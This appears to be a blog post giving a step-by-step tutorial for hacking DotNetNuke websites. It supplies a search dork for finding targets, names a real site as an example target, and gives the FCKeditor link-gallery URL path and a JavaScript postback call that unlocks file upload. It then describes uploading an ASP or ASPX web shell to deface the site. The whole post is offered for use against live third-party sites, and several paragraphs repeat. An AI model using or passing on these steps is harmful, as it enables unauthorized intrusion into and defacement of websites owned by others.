DNN Full Tutorial
Code:
Dork:inurl:"/portals/0"
suppose you get these sites
Code:
http://www.wittur.se/
Here is now the exploit
Code:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
simply copy the exploit url to the site end
Code:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
after selecting the third option just reply the whole url by this script
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.
now u can upload jpg,gif,png,pdf,ppt file format, try the exploit for more file formats..
n yeh u can upload the shell too on the website
u need a aspx or asp shell to upload the site, now how to upload a asp or aspx shell to the site. PM me for this..
after upload the aspx or asp shell u can deface the whole website
now u can upload jpg,gif,png,pdf,ppt file format, try the exploit for more file formats..
n yeh u can upload the shell too on the website
u need a aspx or asp shell to upload the site, now how to upload a asp or aspx shell to the site. PM me for this..
after upload the aspx or asp shell u can deface the whole website
No comments:
Post a Comment